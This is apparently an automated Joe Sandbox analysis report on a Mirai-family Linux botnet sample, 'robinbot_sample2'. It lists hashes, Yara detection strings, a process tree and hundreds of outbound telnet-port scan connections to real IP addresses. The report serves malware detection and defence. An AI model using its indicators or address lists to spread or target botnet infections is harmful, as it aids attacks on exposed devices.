Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
robinbot_sample2

Overview

General Information

Sample Name:robinbot_sample2
Analysis ID:756120
MD5:d65bd6175517e0bcb6a6fc077cdcb655
SHA1:f1a6dc5a7b2678f6e499e44de99beb0c0936d626
SHA256:345e9c1b6ce0f34a6be63e5411348f4c1588654f61fcbc4d667cab4c8aef1ae3
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Multi AV Scanner detection for submitted file
Sample deletes itself
Yara signature match
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.
Joe Sandbox Version:36.0.0 Rainbow Opal
Analysis ID:756120
Start date and time:2022-11-29 16:51:40 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 14s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:robinbot_sample2
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Analysis Mode:default
Detection:MAL
Classification:mal100.troj.evad.lin@0/2@0/0
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: robinbot_sample2
Command:/tmp/robinbot_sample2
PID:9446
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Hei
Standard Error:
  • system is lnxubuntu1
  • upstart New Fork (PID: 9467, Parent: 3310)
  • sh (PID: 9467, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 9468, Parent: 9467)
    • date (PID: 9468, Parent: 9467, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 9485, Parent: 9467)
    • apport-checkreports (PID: 9485, Parent: 9467, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system
  • upstart New Fork (PID: 9494, Parent: 3310)
  • sh (PID: 9494, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 9495, Parent: 9494)
    • date (PID: 9495, Parent: 9494, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 9501, Parent: 9494)
    • apport-gtk (PID: 9501, Parent: 9494, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • upstart New Fork (PID: 9521, Parent: 3310)
  • sh (PID: 9521, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 9526, Parent: 9521)
    • date (PID: 9526, Parent: 9521, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 9533, Parent: 9521)
    • apport-gtk (PID: 9533, Parent: 9521, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • cleanup
SourceRuleDescriptionAuthorStrings
robinbot_sample2Mirai_Botnet_MalwareDetects Mirai Botnet MalwareFlorian Roth
  • 0x1b9b8:$x2: /dev/misc/watchdog
  • 0x1b9a8:$x3: /dev/watchdog
  • 0x1dec0:$s1: LCOGQGPTGP
  • 0x1db94:$s3: CFOKLKQVPCVMP
  • 0x1db78:$s4: QWRGPTKQMP
  • 0x1dad4:$s5: HWCLVGAJ
  • 0x1dd44:$s6: NKQVGLKLE
robinbot_sample2JoeSecurity_Mirai_8Yara detected MiraiJoe Security
    robinbot_sample2JoeSecurity_Mirai_9Yara detected MiraiJoe Security
      robinbot_sample2JoeSecurity_Mirai_6Yara detected MiraiJoe Security
        robinbot_sample2JoeSecurity_Mirai_4Yara detected MiraiJoe Security
          Click to see the 1 entries
          SourceRuleDescriptionAuthorStrings
          9457.1.00007fddd7163000.00007fddd7183000.r-x.sdmpMirai_Botnet_MalwareDetects Mirai Botnet MalwareFlorian Roth
          • 0x1b9b8:$x2: /dev/misc/watchdog
          • 0x1b9a8:$x3: /dev/watchdog
          • 0x1dec0:$s1: LCOGQGPTGP
          • 0x1db94:$s3: CFOKLKQVPCVMP
          • 0x1db78:$s4: QWRGPTKQMP
          • 0x1dad4:$s5: HWCLVGAJ
          • 0x1dd44:$s6: NKQVGLKLE
          9457.1.00007fddd7163000.00007fddd7183000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
            9457.1.00007fddd7163000.00007fddd7183000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
              9457.1.00007fddd7163000.00007fddd7183000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
                9457.1.00007fddd7163000.00007fddd7183000.r-x.sdmpJoeSecurity_Mirai_4Yara detected MiraiJoe Security
                  Click to see the 19 entries
                  No Snort rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: robinbot_sample2Avira: detected
                  Source: robinbot_sample2ReversingLabs: Detection: 73%
                  Source: global trafficTCP traffic: 192.168.2.20:37320 -> 42.154.205.241:80
                  Source: global trafficTCP traffic: 192.168.2.20:34018 -> 37.223.66.244:80
                  Source: global trafficTCP traffic: 192.168.2.20:43946 -> 145.173.40.234:80
                  Source: global trafficTCP traffic: 192.168.2.20:33152 -> 42.199.43.64:80
                  Source: global trafficTCP traffic: 192.168.2.20:33966 -> 91.89.61.211:80
                  Source: global trafficTCP traffic: 192.168.2.20:48944 -> 91.152.149.137:80
                  Source: global trafficTCP traffic: 192.168.2.20:57402 -> 26.185.228.158:80
                  Source: global trafficTCP traffic: 192.168.2.20:41240 -> 16.249.59.117:80
                  Source: global trafficTCP traffic: 192.168.2.20:55830 -> 161.35.220.12:80
                  Source: global trafficTCP traffic: 192.168.2.20:41444 -> 41.26.41.108:80
                  Source: global trafficTCP traffic: 192.168.2.20:33886 -> 219.175.213.145:80
                  Source: global trafficTCP traffic: 192.168.2.20:54532 -> 1.84.59.210:80
                  Source: global trafficTCP traffic: 192.168.2.20:40438 -> 49.9.6.163:80
                  Source: global trafficTCP traffic: 192.168.2.20:60816 -> 89.217.54.248:80
                  Source: global trafficTCP traffic: 192.168.2.20:46184 -> 199.27.152.82:80
                  Source: global trafficTCP traffic: 192.168.2.20:59868 -> 147.83.72.52:80
                  Source: global trafficTCP traffic: 192.168.2.20:48696 -> 201.164.126.60:8080
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 40.143.70.145:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 176.94.182.162:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 94.2.92.235:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 219.192.100.9:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 120.59.254.200:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 44.104.110.234:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 184.163.42.166:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 27.150.167.37:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 220.0.69.217:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 218.211.44.245:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 140.176.80.240:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 214.2.88.114:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 208.12.124.152:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 100.141.252.116:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 106.39.26.93:2323
                  Source: global trafficTCP traffic: 192.168.2.20:38834 -> 176.97.210.195:7267
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 9.144.0.23:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 67.56.162.135:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 204.213.137.229:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 195.244.8.248:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 182.47.46.149:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 108.93.248.159:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 180.11.77.115:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 26.39.219.24:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 56.166.53.121:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 37.181.118.18:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 6.38.19.157:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 205.154.167.91:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 208.154.53.46:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 112.85.175.26:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 62.196.127.233:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 90.15.146.195:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 161.7.79.212:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 89.7.74.99:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 81.93.31.72:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 24.32.75.125:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 164.107.53.82:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 20.163.190.169:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 168.213.217.208:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 48.105.150.152:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 72.167.115.230:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 110.164.112.252:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 36.31.148.86:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 93.210.106.90:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 190.39.105.103:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 17.65.243.129:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 12.48.174.70:2323
                  Source: global trafficTCP traffic: 192.168.2.20:54660 -> 207.85.112.138:8080
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 2.27.249.91:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 135.208.129.181:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 35.78.16.235:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 191.40.65.103:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 113.69.142.156:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 104.213.231.84:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 176.255.194.15:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 154.125.72.141:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 29.98.200.133:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 87.21.204.129:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 112.221.161.248:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 76.44.15.28:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 47.73.76.97:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 199.32.76.15:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 123.228.205.74:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 209.60.109.165:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 149.167.140.56:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 124.246.72.31:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 57.107.71.157:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 169.73.31.184:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 106.87.187.188:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 157.58.163.127:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 30.216.111.240:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 83.73.93.202:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 49.253.181.16:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 119.171.189.158:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 158.232.199.125:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 59.46.82.185:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 198.47.112.79:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 219.79.215.56:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 152.117.70.140:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 125.168.121.111:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 195.184.8.236:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 153.152.197.59:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 205.197.162.152:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 153.107.177.56:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 180.250.16.119:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 61.74.168.39:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 39.18.33.242:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 47.188.100.105:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 109.123.90.84:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 42.107.26.114:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 17.71.162.130:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 83.218.137.20:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 42.120.85.235:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 57.142.16.211:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 80.238.143.53:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 82.67.85.210:2323
                  Source: global trafficTCP traffic: 192.168.2.20:56946 -> 200.27.253.193:8080
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 223.82.133.227:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 49.178.41.177:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 7.152.57.196:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 198.245.120.25:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 188.43.33.252:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 24.120.188.150:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 34.110.245.2:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 109.67.7.75:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 31.71.10.38:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 177.202.131.26:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 59.99.126.202:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 27.107.50.7:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 90.3.85.192:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 170.210.37.157:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 168.21.107.69:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 177.107.49.81:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 175.26.74.69:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 160.101.115.63:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 152.40.31.31:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 199.208.228.19:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 143.255.222.115:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 68.5.134.90:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 17.12.48.252:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 54.13.46.179:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 223.4.49.42:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 79.133.33.255:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 66.39.126.190:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 110.33.23.201:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 82.108.213.202:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 182.222.5.142:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 180.67.91.10:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 4.151.29.36:2323
                  Source: global trafficTCP traffic: 192.168.2.20:36062 -> 200.57.26.12:8080
                  Source: global trafficTCP traffic: 192.168.2.20:59194 -> 187.211.154.101:8080
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 121.106.196.88:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 187.96.30.138:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 152.62.78.255:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 210.103.84.190:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 113.206.93.58:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 86.223.70.244:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 66.224.96.3:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 8.205.235.221:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 220.11.92.205:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 208.168.94.174:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 206.89.171.195:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 105.196.71.196:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 35.209.213.148:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 198.89.148.236:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 48.83.146.241:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 42.234.7.101:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 73.192.251.225:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 174.173.119.201:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 215.236.84.125:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 144.254.120.37:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 171.128.40.117:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 47.220.154.102:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 3.3.206.48:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 146.144.111.237:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 90.178.237.244:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 186.208.75.78:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 58.169.242.105:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 119.85.173.24:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 85.159.243.28:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 67.120.217.1:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 97.109.159.19:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 51.237.146.100:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 208.250.16.97:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 133.214.106.48:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 118.26.82.24:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 99.238.192.234:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 211.8.215.61:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 39.109.181.49:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 173.40.20.156:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 171.17.220.252:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 33.228.119.75:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 202.7.45.214:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 206.83.23.174:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 123.233.94.220:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 132.221.149.96:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 111.255.134.124:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 142.195.171.97:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 193.81.43.93:2323
                  Source: global trafficTCP traffic: 192.168.2.20:44054 -> 189.128.113.12:8080
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 38.240.104.100:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 149.251.204.245:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 117.221.156.210:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 44.55.80.63:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 62.62.141.145:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 28.102.129.155:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 9.149.218.104:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 163.205.37.29:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 213.67.194.241:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 44.210.22.157:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 171.61.149.71:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 85.3.137.195:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 28.155.152.45:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 56.158.28.182:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 94.26.25.188:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 59.220.40.178:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 211.107.172.123:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 175.85.194.133:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 45.223.222.28:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 18.225.146.112:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 195.220.152.194:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 45.66.140.56:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 128.201.202.62:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 175.135.81.53:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 92.170.211.143:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 55.189.40.162:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 34.151.243.178:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 218.110.147.30:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 128.61.22.34:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 8.134.253.63:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 103.13.67.26:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 183.124.120.231:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 181.243.248.87:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 217.40.159.31:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 95.246.17.121:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 193.235.238.217:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 221.238.253.198:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 151.170.56.57:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 118.212.204.5:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 50.66.15.100:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 221.10.101.112:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 49.27.208.220:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 137.185.156.189:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 99.50.43.158:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 194.2.91.209:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 113.244.8.78:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 130.155.195.243:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 175.69.33.199:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 216.141.204.160:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 95.49.187.135:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 210.198.227.122:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 37.71.184.216:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 171.24.94.1:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 204.97.158.56:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 48.179.34.204:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 48.85.155.11:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 125.9.119.112:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 214.155.195.213:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 120.245.185.11:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 105.36.218.29:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 85.3.148.129:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 171.99.26.132:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 51.26.53.145:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 106.228.210.205:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 169.171.167.30:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 195.57.37.63:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 163.33.118.19:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 65.104.229.105:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 119.249.178.238:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 106.202.99.119:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 98.6.207.101:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 202.173.185.148:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 130.129.39.142:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 126.7.87.207:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 176.137.120.110:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 200.226.161.173:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 191.188.64.1:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 91.251.220.185:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 118.182.136.64:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 52.113.130.146:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 89.154.5.218:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 66.135.143.31:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 221.215.69.240:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 51.76.210.97:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 91.177.163.31:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 1.149.224.146:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 218.25.29.139:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 136.173.8.86:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 153.37.160.214:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 201.85.46.146:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 221.185.32.198:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 97.23.59.53:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 184.176.145.228:2323
